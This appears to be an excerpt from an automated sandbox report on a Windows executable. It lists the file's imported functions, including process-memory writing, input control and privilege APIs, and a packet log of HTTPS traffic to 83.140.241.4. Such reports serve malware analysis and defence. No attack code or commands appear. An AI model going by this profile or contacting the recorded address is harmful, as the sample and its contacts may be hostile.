RT_MANIFEST | 0x1e83dc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
DLL | Import |
---|---|
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
PSAPI.DLL | GetProcessMemoryInfo |
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
UxTheme.dll | IsThemeActive |
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext |
USER32.dll | GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW |
GDI32.dll | EndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath |
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW |
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
OLEAUT32.dll | VariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData |
Language of compilation system | Country where language is spoken |
---|---|
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 7, 2024 21:30:04.774694920 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774720907 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774732113 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774802923 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774811029 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774847984 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774863958 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774883986 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774888992 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774904966 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774909973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774924994 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774934053 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774954081 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774965048 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774991989 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.775017977 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.919756889 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.919790983 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.919842958 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.919881105 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941126108 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941184044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941235065 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941251040 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941279888 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941287994 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941299915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941333055 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941342115 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941363096 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941375971 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941382885 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941404104 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941436052 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941443920 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941478014 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941487074 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941504002 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941519976 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941557884 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941592932 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.083811045 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.083853006 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.084054947 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.114969015 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.114974022 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.114986897 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115005970 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115020990 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115227938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.115227938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.115267992 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115307093 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115319967 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115415096 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.115426064 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115447998 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115555048 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.327399015 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.327596903 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.438004971 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.438047886 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.438069105 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.438133001 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.438184977 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.465965033 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.465974092 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.465986013 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466001987 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466025114 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466031075 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466036081 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466119051 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466129065 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466142893 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466155052 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466248989 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466255903 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466274977 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466284990 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466355085 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466372013 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466382980 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466439009 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.634366035 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.634392977 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.634476900 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658369064 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658380032 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658392906 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658406973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658425093 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658432007 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658437967 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658457041 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658463001 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658505917 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658514023 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658524990 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658552885 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658557892 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658579111 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658596039 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658601999 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658638954 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658682108 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.837508917 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.837547064 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.837567091 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.837651014 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859457970 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859463930 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859500885 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859513044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859627962 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859636068 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859662056 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859688044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859723091 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859729052 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859802961 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859812021 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859916925 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.010876894 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.010905981 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.010936975 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.011014938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033019066 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033047915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033086061 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033099890 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033307076 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033307076 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033318996 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033350945 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033368111 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033385038 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033397913 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033447027 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033456087 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033473969 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033528090 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.243410110 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.243571997 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.254591942 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.254610062 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.254638910 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.254699945 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285456896 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285485983 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285521984 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285532951 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285634995 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285646915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285664082 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285682917 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285741091 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285748005 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285763025 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285814047 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285814047 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285885096 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285891056 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285943985 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.480089903 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.480129004 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.480159044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.480328083 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.480328083 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.499790907 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.499819994 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.499846935 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.499856949 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.499968052 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.499979973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.500009060 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.500030994 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.500058889 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.500111103 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
